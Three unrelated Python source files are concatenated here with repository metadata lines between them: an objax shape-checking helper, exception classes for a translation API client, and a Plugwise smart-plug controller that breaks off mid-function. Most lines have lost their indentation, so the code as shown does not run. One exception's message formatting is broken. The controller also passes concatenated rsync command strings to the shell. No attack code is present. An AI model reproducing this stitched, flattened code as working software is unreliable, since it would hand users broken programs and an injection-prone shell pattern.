# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ['assert_assigned_type_and_shape_match']
import jax
from objax.typing import JaxArray
TRACER_TYPES = (jax.interpreters.partial_eval.JaxprTracer,
jax.interpreters.partial_eval.DynamicJaxprTracer)
def split_shape_and_device(array):
if isinstance(array, jax.interpreters.pxla.ShardedDeviceArray):
return array.shape[0], array.shape[1:]
else:
return None, array.shape
def assert_assigned_type_and_shape_match(existing_tensor, new_tensor):
assert isinstance(new_tensor, JaxArray.__args__), \
        f'Assignments to variable must be an instance of JaxArray, but received {type(new_tensor)}.'
new_tensor_device, new_tensor_shape = split_shape_and_device(new_tensor)
self_device, self_shape = split_shape_and_device(existing_tensor)
device_mismatch_error = f'Can not replicate a variable that is currently on ' \
f'{self_device} devices to {new_tensor_device} devices.'
assert (new_tensor_device is None) or (self_device is None) or (self_device == new_tensor_device), \
device_mismatch_error
shorter_length = min(len(new_tensor.shape), len(existing_tensor.shape))
is_special_ok = (isinstance(new_tensor, TRACER_TYPES) or isinstance(existing_tensor, TRACER_TYPES))
is_special_ok = is_special_ok and existing_tensor.shape[-shorter_length:] == new_tensor.shape[-shorter_length:]
shape_mismatch_error = f'Assign can not change shape of variable. The current variable shape is {self_shape},' \
f' but the requested new shape is {new_tensor_shape}.'
assert is_special_ok or new_tensor_shape == self_shape or new_tensor.shape == existing_tensor.shape, \
shape_mismatch_error
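# Hedged usage sketch (not part of the original module; assumes jax.numpy is
# importable): equal shapes pass silently, a mismatch raises the
# AssertionError composed above.
if __name__ == '__main__':
    import jax.numpy as jn
    current = jn.zeros((3, 4))
    assert_assigned_type_and_shape_match(current, jn.ones((3, 4)))  # passes
    try:
        assert_assigned_type_and_shape_match(current, jn.ones((2, 4)))
    except AssertionError as e:
        print(e)  # reports the current and requested shapes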
|
google/objax
|
objax/util/check.py
|
Python
|
apache-2.0
| 2,313 | 0.003891 |
# -*- coding: utf-8 -*-
# This file is part of translate.
#
# translate is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# translate is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# translate. If not, see <http://www.gnu.org/licenses/>.
"""
translate.client.exceptions
~~~~~~~~~~~~~~~~~~~~~~~~~~~
These are exception classes that are used by translate.client.Client. Most of
these classes are simple wrappers, just to differentiate different types of
errors. They can be constructed from a requests response object, or JSON
,returned from an API call.
"""
import json
import logging
log = logging.getLogger(__name__)
class TranslateException(Exception):
"""Mostly empty base class for exceptions relating to translate.
This class is used as a catch-all for exceptions thrown by the server. If
possible, a more specific subclass of this exception will be used.
"""
@classmethod
def from_json(cls, obj, status_code=400):
"""Return the proper exception class from the JSON object returned from
the server.
"""
exceptions = {
429: RateLimitException,
431: SizeLimitException,
452: TranslationException,
453: TranslatorException,
454: BadLanguagePairException
}
try:
code = obj['code'] if ('code' in obj) else status_code
klass = exceptions[code]
return klass.from_json(obj)
except KeyError:
return cls("Unknown error occured: " + repr(obj))
@classmethod
def from_response(cls, resp):
"""Generate a proper exception from the given requests response object
and return it.
"""
try:
obj = json.loads(resp.text)
return TranslateException.from_json(obj, resp.status_code)
except ValueError:
log.error("Was given invalid JSON, bailing...")
return TranslateException.from_json({}, resp.status_code)
class HTTPException(TranslateException):
"""Raised when an error occurs with the HTTP connection to the server
(e.g. host is not available, doesn't respond, etc.)
"""
pass
class RateLimitException(TranslateException):
"""Exception raised when a client goes over the ratelimit."""
def __init__(self, limit, per, reset):
self.limit = limit
self.per = per
self.reset = reset
@classmethod
def from_json(cls, obj):
try:
details = obj.get('details', {})
return cls(limit=details['limit'], per=details['per'],
reset=details['reset'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(limit=0, per=0, reset=0)
def __str__(self):
return "Rate limit exceeded: {0} reqs / {1}s. Try again at {2}".format(
self.limit, self.per, self.reset)
class SizeLimitException(TranslateException):
"""Exception raised when a client tries to translate a text that is over
the server's size limit.
"""
def __init__(self, len, limit):
self.len = len
self.limit = limit
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(len=details['len'], limit=details['limit'])
except KeyError:
log.error("Received invalid JSON: %s", repr(obj))
return cls(len=0, limit=0)
def __str__(self):
return "Specified text was too large: %d bytes. Maximum is %d bytes"\
.format(self.len, self.limit)
class TranslationException(TranslateException):
"""Returned on bad parameters to /translate"""
@classmethod
def from_json(cls, obj):
try:
msg = obj['message']
return cls("Bad parameters to translate API method: " + msg)
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls("Bad parameters to translate API method.")
class TranslatorException(TranslateException):
"""Returned when bad parameters are passed to the /translate method. (This
probably indicates some kind of API / Client bug.)
"""
def __init__(self, lang_pair, tried):
self.lang_pair = lang_pair
self.tried = tried
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
pair = (details['from'], details['to'])
return cls(lang_pair=pair, tried=details['tried'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'), tried=['unknown'])
def __str__(self):
return "Failed to translate {0} (tried: {1})".format(self.lang_pair,
self.tried)
class BadLanguagePairException(TranslateException):
"""Raised when the client tried to translate using a language pair not
supported by the server
"""
def __init__(self, lang_pair):
self.lang_pair = lang_pair
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(lang_pair=(details['from'], details['to']))
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'))
def __str__(self):
return "Unsupported language pair: {0}".format(self.lang_pair)
|
erik/translate
|
translate/client/exceptions.py
|
Python
|
gpl-3.0
| 5,955 | 0 |
#!/usr/bin/env python3
# Copyright (C) 2012,2013,2014,2015,2016,2017,2018,2019,2020 Seven Watt <info@sevenwatt.com>
# <http://www.sevenwatt.com>
#
# This file is part of Plugwise-2-py.
#
# Plugwise-2-py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Plugwise-2-py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Plugwise-2-py. If not, see <http://www.gnu.org/licenses/>.
#
# The program is a major modification and extension to:
# python-plugwise - written in 2011 by Sven Petai <hadara@bsd.ee>
# which itself is inspired by Plugwise-on-Linux (POL):
# POL v0.2 - written in 2009 by Maarten Damen <http://www.maartendamen.com>
from serial.serialutil import SerialException
from plugwise import *
from swutil.util import *
from swutil.pwmqtt import *
from plugwise.api import *
from datetime import datetime, timedelta
import time
import calendar
import subprocess
import glob
import os
import logging
import queue
import threading
import itertools
mqtt = True
try:
import paho.mqtt.client as mosquitto
except:
mqtt = False
print(mqtt)
import pprint as pp
import json
#from json import encoder
#encoder.FLOAT_REPR = lambda o: format(o, '.2f')
json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
def jsondefault(object):
return object.decode('utf-8')
#DEBUG_PROTOCOL = False
log_comm(True)
#LOG_LEVEL = 2
schedules_path = "config/schedules"
cfg = json.load(open("config/pw-hostconfig.json"))
tmppath = cfg['tmp_path']+'/'
perpath = cfg['permanent_path']+'/'
logpath = cfg['log_path']+'/'
port = cfg['serial']
epochf = False
if 'log_format' in cfg and cfg['log_format'] == 'epoch':
epochf = True
actdir = 'pwact/'
actpre = 'pwact-'
actpost = '.log'
curpre = 'pwpower'
curpost = '.log'
logdir = 'pwlog/'
logpre = 'pw-'
logpost = '.log'
open_logcomm(logpath+"pw-communication.log")
#prepare for cleanup of /tmp after n days.
cleanage = 604800 # seven days in seconds
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
yrfolder = str(now.year)+'/'
if not os.path.exists(perpath+yrfolder+actdir):
os.makedirs(perpath+yrfolder+actdir)
if not os.path.exists(perpath+yrfolder+logdir):
os.makedirs(perpath+yrfolder+logdir)
if not os.path.exists(tmppath+yrfolder+actdir):
os.makedirs(tmppath+yrfolder+actdir)
rsyncing = True
if tmppath == None or tmppath == "/":
tmppath = perpath
rsyncing = False
if rsyncing:
# Could be a recovery after a power failure
# /tmp/pwact-* may have disappeared, while the persitent version exists
perfile = perpath + yrfolder + actdir + actpre + now.date().isoformat() + '*' + actpost
cmd = "rsync -aXuq " + perfile + " " + tmppath + yrfolder + actdir
subprocess.call(cmd, shell=True)
class PWControl(object):
"""Main program class
"""
def __init__(self):
"""
...
"""
global port
global tmppath
global curpre
global curpost
self.device = Stick(port, timeout=1)
self.staticconfig_fn = 'config/pw-conf.json'
self.control_fn = 'config/pw-control.json'
#self.schedule_fn = 'config/pw-schedules.json'
self.last_schedule_ts = None
self.last_control_ts = None
self.circles = []
self.schedules = []
self.controls = []
self.controlsjson = dict()
self.save_controls = False
self.bymac = dict()
self.byname = dict()
self.schedulebyname = dict()
self.curfname = tmppath + curpre + curpost
self.curfile = open(self.curfname, 'w')
self.statuslogfname = tmppath+'pw-status.json'
self.statusfile = open(self.statuslogfname, 'w')
self.statusdumpfname = perpath+'pw-statusdump.json'
self.actfiles = dict()
self.logfnames = dict()
self.daylogfnames = dict()
self.lastlogfname = perpath+'pwlastlog.log'
#read the static configuration
sconf = json.load(open(self.staticconfig_fn))
i=0
for item in sconf['static']:
#remove tabs which survive dialect='trimmed'
for key in item:
if isinstance(item[key],str): item[key] = item[key].strip()
item['mac'] = item['mac'].upper()
if item['production'].strip().lower() in ['true', '1', 't', 'y', 'yes', 'on']:
item['production'] = True
            if 'reverse_pol' not in item:
item['reverse_pol'] = False
self.bymac[item.get('mac')]=i
self.byname[item.get('name')]=i
#exception handling timeouts done by circle object for init
self.circles.append(Circle(item['mac'], self.device, item))
self.set_interval_production(self.circles[-1])
i += 1
info("adding circle: %s" % (self.circles[-1].name,))
#retrieve last log addresses from persistent storage
with open(self.lastlogfname, 'a+') as f:
f.seek(0)
for line in f:
parts = line.split(',')
mac, logaddr = parts[0:2]
if len(parts) == 4:
idx = int(parts[2])
ts = int(parts[3])
else:
idx = 0
ts = 0
logaddr = int(logaddr)
debug("mac -%s- logaddr -%s- logaddr_idx -%s- logaddr_ts -%s-" % (mac, logaddr, idx, ts))
try:
self.circles[self.bymac[mac]].last_log = logaddr
self.circles[self.bymac[mac]].last_log_idx = idx
self.circles[self.bymac[mac]].last_log_ts = ts
except:
error("PWControl.__init__(): lastlog mac not found in circles")
        self.schedulesstat = dict((f, os.path.getmtime(f)) for f in glob.glob(schedules_path+'/*.json'))
self.schedules = self.read_schedules()
self.poll_configuration()
def get_relays(self):
"""
Update the relay state for circles with schedules enabled.
"""
for c in self.circles:
if c.online and c.schedule_state == 'on':
try:
c.get_info()
except (TimeoutException, SerialException, ValueError) as reason:
debug("Error in get_relays(): %s" % (reason,))
continue
#publish relay_state for schedule-operated circles.
#could also be done unconditionally every 15 minutes in main loop.
self.publish_circle_state(c.mac)
def get_status_json(self, mac):
try:
c = self.circles[self.bymac[mac]]
control = self.controls[self.controlsbymac[mac]]
except:
info("get_status_json: mac not found in circles or controls")
return ""
try:
status = c.get_status()
status["mac"] = status["mac"]
status["monitor"] = (control['monitor'].lower() == 'yes')
status["savelog"] = (control['savelog'].lower() == 'yes')
#json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
#msg = json.dumps(status, default = jsondefault)
msg = json.dumps(status)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in get_status_json: %s" % (reason,))
msg = ""
return str(msg)
def log_status(self):
self.statusfile.seek(0)
self.statusfile.truncate(0)
self.statusfile.write('{"circles": [\n')
comma = False
for c in self.circles:
if comma:
self.statusfile.write(",\n")
else:
comma = True
#json.dump(c.get_status(), self.statusfile, default = jsondefault)
self.statusfile.write(self.get_status_json(c.mac))
#str('{"typ":"circle","ts":%d,"mac":"%s","online":"%s","switch":"%s","schedule":"%s","power":%.2f,
#"avgpower1h":%.2f,"powts":%d,"seents":%d,"interval":%d,"production":%s,"monitor":%s,"savelog":%s}'
self.statusfile.write('\n] }\n')
self.statusfile.flush()
def dump_status(self):
self.statusdumpfile = open(self.statusdumpfname, 'w+')
self.statusdumpfile.write('{"circles": [\n')
comma = False
for c in self.circles:
if comma:
self.statusdumpfile.write(",\n")
else:
comma = True
json.dump(c.dump_status(), self.statusdumpfile, default = jsondefault)
self.statusdumpfile.write('\n] }\n')
self.statusdumpfile.close()
def sync_time(self):
for c in self.circles:
if not c.online:
continue
try:
info("sync_time: circle %s time is %s" % (c.aname, c.get_clock().isoformat()))
if c.type()=='circle+':
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
c.set_circleplus_datetime(now)
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
c.set_clock(now)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in sync_time: %s" % (reason,))
def set_interval_production(self, c):
if not c.online:
return
try:
#TODO: Check this. Previously log_interval was only set when difference between config file and circle state
c.set_log_interval(c.loginterval, c.production)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in set_interval_production: %s" % (reason,))
def generate_test_schedule(self, val):
#generate test schedules
if val == -2:
testschedule = []
for i in range (0, 336):
testschedule.append(-1)
testschedule.append(0)
else:
testschedule = []
for i in range (0, 672):
testschedule.append(val)
return testschedule
def read_schedules(self):
#read schedules
debug("read_schedules")
newschedules = []
self.schedulebyname = dict()
newschedules.append(self.generate_test_schedule(-2))
self.schedulebyname['__PW2PY__test-alternate']=0
info("generate schedule: __PW2PY__test-alternate")
newschedules.append(self.generate_test_schedule(10))
self.schedulebyname['__PW2PY__test-10']=1
info("generate schedule: __PW2PY__test-10")
i=len(newschedules)
schedule_names = [os.path.splitext(os.path.basename(x))[0] for x in glob.glob(schedules_path+'/*.json')]
for sched_fn in schedule_names:
schedfpath = schedules_path+'/'+sched_fn+'.json'
try:
rawsched = json.load(open(schedfpath))
self.schedulebyname[sched_fn]=i
newschedules.append(list(itertools.chain.from_iterable(rawsched['schedule'])))
info("import schedule: %s.json" % (sched_fn,))
#print("import schedule: %s.json" % (sched_fn,))
i += 1
except:
error("Unable to read or parse schedule file %s" % (schedfpath,))
return newschedules
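    # Hedged note on the schedule file layout (inferred from the parser above):
    # each config/schedules/<name>.json holds {"schedule": [[...], [...], ...]},
    # typically seven day-lists of 96 quarter-hour values that flatten to the
    # 672 entries used elsewhere in this class.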
def apply_schedule_changes(self):
""" in case off a failure to upload schedule,
c.online is set to False by api, so reload handled through
self.test_offline() and self.apply_<func>_to_circle
"""
debug("apply_schedule_changes()")
for c in self.circles:
if not c.online:
continue
if c.schedule != None:
if c.schedule.name in self.schedulebyname:
sched = self.schedules[self.schedulebyname[c.schedule.name]]
if sched != c.schedule._watt:
info("apply_schedule_changes: schedule changed. Update in circle %s - %s" % (c.name, c.schedule.name))
#schedule changed so upload to this circle
c.define_schedule(c.schedule.name, sched, time.localtime().tm_isdst)
try:
sched_state = c.schedule_state
c.schedule_off()
c.load_schedule(time.localtime().tm_isdst)
#update scheduleCRC
c.get_clock()
if sched_state == 'on':
c.schedule_on()
except (ValueError, TimeoutException, SerialException) as reason:
#failure to upload schedule.
c.undefine_schedule() #clear schedule forces a retry at next call
error("Error during uploading schedule: %s" % (reason,))
self.publish_circle_state(c.mac)
else:
error("Error during uploading schedule. Schedule %s not found." % (c.schedule.name,))
def read_apply_controls(self):
debug("read_apply_controls")
#read the user control settings
controls = json.load(open(self.control_fn))
self.controlsjson = controls
self.controlsbymac = dict()
newcontrols = []
i=0
for item in controls['dynamic']:
#remove tabs which survive dialect='trimmed'
for key in item:
if isinstance(item[key],str): item[key] = item[key].strip()
item['mac'] = item['mac'].upper()
newcontrols.append(item)
self.controlsbymac[item['mac']]=i
i += 1
#set log settings
if 'log_comm' in controls:
log_comm(str(controls['log_comm']).strip().lower() == 'yes')
info("COMMU with str() %s" % (str(controls['log_comm']).strip().lower() == 'yes',))
info("COMMU with u %s" % (controls['log_comm'].strip().lower() == 'yes',))
if 'log_level' in controls:
if str(controls['log_level']).strip().lower() == 'debug':
log_level(logging.DEBUG)
elif str(controls['log_level']).strip().lower() == 'info':
log_level(logging.INFO)
elif str(controls['log_level']).strip().lower() == 'error':
log_level(logging.ERROR)
else:
log_level(logging.INFO)
self.controls = newcontrols
for mac, idx in self.controlsbymac.items():
self.apply_control_to_circle(self.controls[idx], mac, force=False)
return
def apply_control_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
updated = self.apply_schedule_to_circle(control, mac, force)
c = self.circles[self.bymac[mac]]
debug('circle mac: %s before1 - state [r,sw,sc] %s %s %s - scname %s' % (mac, c.relay_state, control['switch_state'], control['schedule_state'], control['schedule']))
debug('circle mac: %s before2 - state [r,sw,sc] %s %s %s' % (c.mac, c.relay_state, c.switch_state, c.schedule_state))
updated = updated | self.apply_schedstate_to_circle(control, mac, force)
if control['schedule_state'] != 'on':
updated = updated | self.apply_switch_to_circle(control, mac, force)
else:
#prime the switch state for consistency between circle and control
try:
c = self.circles[self.bymac[mac]]
updated = updated | (c.switch_state != control['switch_state'])
c.switch_state = control['switch_state']
except:
info("mac from controls not found in circles while prime switch state")
if updated:
self.publish_circle_state(mac)
debug('circle mac: %s after1 - state [r,sw,sc] %s %s %s - scname %s' % (mac, c.relay_state, control['switch_state'], control['schedule_state'], control['schedule']))
debug('circle mac: %s after2 - state [r,sw,sc] %s %s %s' % (c.mac, c.relay_state, c.switch_state, c.schedule_state))
def apply_schedule_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
try:
c = self.circles[self.bymac[mac]]
except:
info("mac from controls not found in circles")
return False
if not c.online:
return False
#load new schedule if required
schedname = str(control['schedule'])
#make sure the scheduleCRC read from circle is set
try:
c.get_clock()
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_schedule_to_circle get_clock: %s" % (reason,))
return False
circle_changed = False
if schedname == '':
#no schedule specified.
try:
#only change schedules when schedule_state = off
c.schedule_off()
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_schedule_to_circle schedule_off: %s" % (reason,))
c.undefine_schedule()
if c.scheduleCRC != 17786:
#set always-on schedule in circle
info('circle mac: %s needs schedule to be undefined' % (mac,))
#print('circle mac: %s needs schedule to be undefined' % (mac,))
try:
c.set_schedule_value(-1)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_schedule_to_circle set always on schedule: %s" % (reason,))
return False
circle_changed = True
else:
try:
sched = self.schedules[self.schedulebyname[schedname]]
if c.schedule is None or schedname != c.schedule.name or sched != c.schedule._watt:
info('circle mac: %s needs schedule to be defined' % (mac,))
#print('circle mac: %s needs schedule to be defined' % (mac,))
#define schedule object for circle
c.define_schedule(schedname, sched, time.localtime().tm_isdst)
#Only upload when mismatch in CRC
debug("apply_control_to_circle: compare CRC's: %d %d" %(c.schedule.CRC, c.scheduleCRC))
if c.schedule.CRC != c.scheduleCRC or c.schedule.dst != time.localtime().tm_isdst:
info('circle mac: %s needs schedule to be uploaded' % (mac,))
try:
c.schedule_off()
c.load_schedule(time.localtime().tm_isdst)
#update scheduleCRC
c.get_clock()
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_control_to_circle load_schedule: %s" % (reason,))
return False
circle_changed = True
except:
error("schedule name from controls '%s' not found in table of schedules" % (schedname,))
return circle_changed
def apply_switch_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
try:
c = self.circles[self.bymac[mac]]
except:
info("mac from controls not found in circles")
return False
if not c.online:
return False
switched = False
#switch on/off if required
sw_state = control['switch_state'].lower()
if sw_state == 'on' or sw_state == 'off':
sw = True if sw_state == 'on' else False
if force or sw_state != c.relay_state or sw_state != c.switch_state:
info('circle mac: %s needs to be switched %s' % (mac, sw_state))
try:
c.switch(sw)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_control_to_circle failed to switch: %s" % (reason,))
return False
switched = True
else:
error('invalid switch_state value in controls file')
return switched
def apply_schedstate_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
try:
c = self.circles[self.bymac[mac]]
except:
info("mac from controls not found in circles")
return False
if not c.online:
print("offline")
return False
switched = False
#force schedule_state to off when no schedule is defined
if ((not control['schedule']) or control['schedule'] == "") and control['schedule_state'].lower() == 'on':
control['schedule_state'] = 'off'
info('circle mac: %s schedule forced to off because no schedule defined' % (mac,))
self.write_control_file()
self.last_control_ts = os.stat(self.control_fn).st_mtime
#switch schedule on/off if required
sw_state = control['switch_state'].lower()
        sw = (sw_state == 'on')
sc_state = control['schedule_state'].lower()
if sc_state == 'on' or sc_state == 'off':
            sc = (sc_state == 'on')
if force or sc_state != c.schedule_state:
info('circle mac: %s needs schedule to be switched %s' % (mac, sc_state))
try:
c.schedule_onoff(sc)
if not sc:
#make sure to put switch in proper position when switching off schedule
c.switch(sw)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in apply_control_to_circle failed to switch schedule: %s" % (reason,))
return False
switched = True
else:
error('invalid schedule_state value in controls file')
return switched
def setup_actfiles(self):
global tmppath
global perpath
global actpre
global actpost
#close all open act files
for m, f in self.actfiles.items():
f.close()
#open actfiles according to (new) config
self.actfiles = dict()
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
today = now.date().isoformat()
yrfold = str(now.year)+'/'
if not os.path.exists(tmppath+yrfold+actdir):
os.makedirs(tmppath+yrfold+actdir)
for mac, idx in self.controlsbymac.items():
if self.controls[idx]['monitor'].lower() == 'yes':
fname = tmppath + yrfold + actdir + actpre + today + '-' + mac + actpost
f = open(fname, 'a')
self.actfiles[mac]=f
# def setup_logfiles(self):
# global tmppath
# global perpath
# global logpre
# global logpost
# #name logfiles according to (new) config
# self.logfnames = dict()
# self.daylogfnames = dict()
# #TODO: use locnow
# now = datetime.now()
# today = now.date().isoformat()
# for mac, idx in self.controlsbymac.iteritems():
# if self.controls[idx]['savelog'].lower() == 'yes':
# try:
# if int(self.circles[self.bymac[self.controls[idx]['mac']]].loginterval) <60:
# #daily logfiles - persistent iso tmp
# #fname = tmppath + logdir + logpre + today + '-' + mac + logpost
# fname = perpath + yrfolder + logdir + logpre + today + '-' + mac + logpost
# self.daylogfnames[mac]=fname
# except:
# #assume contineous logging only
# pass
# #contineous log files
# fname = perpath + yrfolder + logdir + logpre + mac + logpost
# self.logfnames[mac]=fname
# #f = open(fname, 'a')
def rsync_to_persistent(self):
global tmppath
global perpath
global actpre
global actpost
global logpre
global logpost
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
year = locnow.year
if rsyncing:
# /tmp/<year>/pwact-*
tmpfile = tmppath + str(year) + '/' + actdir + actpre + '*' + actpost
cmd = "rsync -aXq " + tmpfile + " " + perpath + str(year) + '/' + actdir
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# /tmp/<prev_year>/pwact-*
tmpfile = tmppath + str(year-1) + '/' + actdir + actpre + '*' + actpost
cmd = "rsync -aXq " + tmpfile + " " + perpath + str(year-1) + '/' + actdir
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def cleanup_tmp(self):
# tmpfiles = tmppath + actpre + '*' + actpost
# for fn in glob.iglob(tmpfiles):
# if time.time()-os.path.getmtime(fn) > cleanage:
# os.unlink(fn)
tmpfiles = tmppath + '*/' + actdir + actpre + '*' + actpost
for fn in glob.iglob(tmpfiles):
if time.time()-os.path.getmtime(fn) > cleanage:
os.unlink(fn)
def test_mtime(self, before, after):
modified = []
if after:
for (bf,bmod) in list(before.items()):
if (bf in after and after[bf] > bmod):
modified.append(bf)
return modified
def poll_configuration(self):
debug("poll_configuration()")
before = self.schedulesstat
try:
            after = dict((f, os.path.getmtime(f)) for f in glob.glob(schedules_path + '/*.json'))
            added = [f for f in after if f not in before]
            removed = [f for f in before if f not in after]
            modified = self.test_mtime(before, after)
if (added or removed or modified):
self.schedules = self.read_schedules()
self.schedulesstat = after
self.apply_schedule_changes()
                #TODO: Remove. The schedule is changed, but the schedule_state is not switched on or off!
#for mac, idx in self.controlsbymac.iteritems():
# self.apply_control_to_circle(self.controls[idx], mac, force=True)
except OSError as reason:
error("Error in poll_configuration(): %s" % (reason,))
# if self.last_schedule_ts != os.stat(self.schedule_fn).st_mtime:
# self.last_schedule_ts = os.stat(self.schedule_fn).st_mtime
# self.schedules = self.read_schedules()
# self.apply_schedule_changes()
if self.last_control_ts != os.stat(self.control_fn).st_mtime:
self.last_control_ts = os.stat(self.control_fn).st_mtime
self.read_apply_controls()
self.setup_actfiles()
#self.setup_logfiles()
#failure to apply control settings to a certain circle results
        #in offline state for that circle, so it gets repaired when the
        #self.test_offline() method detects it is back online.
        #a failure to load schedule data also results in online = False,
#and recovery is done by the same functions.
def process_mqtt_commands(self):
updated = False
while not qsub.empty():
rcv = qsub.get()
topic = rcv[0]
payl = rcv[1]
info("process_mqtt_commands: %s %s" % (topic, payl))
#topic format: plugwise2py/cmd/<cmdname>/<mac>
st = topic.split('/')
try:
mac = st[-1]
cmd = st[-2]
#msg format: json: {"mac":"...", "cmd":"", "val":""}
msg = json.loads(payl)
control = self.controls[self.controlsbymac[mac]]
val = msg['val']
            except (ValueError, KeyError, IndexError):
error("MQTT: Invalid message format in topic or JSON payload")
continue
if cmd == "switch":
val = val.lower()
if val == "on" or val == "off":
control['switch_state'] = val
updated = self.apply_switch_to_circle(control, mac)
#switch command overrides schedule_state setting
control['schedule_state'] = "off"
else:
error("MQTT command has invalid value %s" % (val,))
elif cmd == "schedule":
val = val.lower()
if val == "on" or val == "off":
control['schedule_state'] = val
updated = self.apply_schedstate_to_circle(control, mac)
else:
error("MQTT command has invalid value %s" % (val,))
elif cmd == "setsched":
error("MQTT command not implemented")
elif cmd == "reqstate":
#refresh power readings for circle
try:
c = self.circles[self.bymac[mac]]
c.get_power_usage()
info("Just read power for status update")
                except Exception:
info("Error in reading power for status update")
#return message is generic state message below
self.publish_circle_state(mac)
if updated:
self.write_control_file()
self.last_control_ts = os.stat(self.control_fn).st_mtime
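    #Hedged sketch of the MQTT command format handled above; the topic layout
    #and payload keys follow the parsing code, the MAC address is a
    #hypothetical placeholder:
    #
    #   topic:   plugwise2py/cmd/switch/000D6F0000ABCDEF
    #   payload: {"mac": "000D6F0000ABCDEF", "cmd": "switch", "val": "on"}
    #
    #The resulting state is published on plugwise2py/state/circle/<mac>.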
def ftopic(self, keyword, mac):
return str("plugwise2py/state/" + keyword +"/" + mac)
def publish_circle_state(self, mac):
qpub.put((self.ftopic("circle", mac), str(self.get_status_json(mac)), True))
def write_control_file(self):
#write control file for testing purposes
fjson = open("config/pw-control.json", 'w')
self.controlsjson['dynamic'] = self.controls
json.dump(self.controlsjson, fjson, indent=4)
fjson.close()
def ten_seconds(self):
"""
Failure to read an actual usage is not treated as a severe error.
The missed values are just not logged. The circle ends up in
        online = False, and self.test_offline() tries to recover it.
"""
self.curfile.seek(0)
self.curfile.truncate(0)
for mac, f in self.actfiles.items():
try:
c = self.circles[self.bymac[mac]]
            except KeyError:
error("Error in ten_seconds(): mac from controls not found in circles")
continue
if not c.online:
continue
#prepare for logging values
if epochf:
ts = calendar.timegm(datetime.utcnow().utctimetuple())
else:
t = datetime.time(datetime.utcnow()-timedelta(seconds=time.timezone))
ts = 3600*t.hour+60*t.minute+t.second
try:
_, usage, _, _ = c.get_power_usage()
#print("%10d, %8.2f" % (ts, usage,))
f.write("%5d, %8.2f\n" % (ts, usage,))
self.curfile.write("%s, %.2f\n" % (mac, usage))
#debug("MQTT put value in qpub")
msg = str('{"typ":"pwpower","ts":%d,"mac":"%s","power":%.2f}' % (ts, mac, usage))
qpub.put((self.ftopic("power", mac), msg, True))
except ValueError:
#print("%5d, " % (ts,))
f.write("%5d, \n" % (ts,))
self.curfile.write("%s, \n" % (mac,))
except (TimeoutException, SerialException) as reason:
#for continuous monitoring just retry
error("Error in ten_seconds(): %s" % (reason,))
f.flush()
#prevent backlog in command queue
if mqtt: self.process_mqtt_commands()
self.curfile.flush()
return
# def hourly(self):
# return
def log_recording(self, control, mac):
"""
Failure to read recordings for a circle will prevent writing any new
history data to the log files. Also the counter in the counter file is not
updated. Consequently, at the next call (one hour later) reading the
history is retried.
"""
fileopen = False
if control['savelog'].lower() == 'yes':
info("%s: save log " % (mac,))
try:
c = self.circles[self.bymac[mac]]
            except KeyError:
error("mac from controls not found in circles")
return
if not c.online:
return
#figure out what already has been logged.
try:
c_info = c.get_info()
#update c.power fields for administrative purposes
c.get_power_usage()
except ValueError:
return
except (TimeoutException, SerialException) as reason:
error("Error in log_recording() get_info: %s" % (reason,))
return
last = c_info['last_logaddr']
first = c.last_log
idx = c.last_log_idx
if c.last_log_ts != 0:
last_dt = datetime.utcfromtimestamp(c.last_log_ts)-timedelta(seconds=time.timezone)
else:
last_dt = None
        if last_dt is None:
debug("start with first %d, last %d, idx %d, last_dt None" % (first, last, idx))
else:
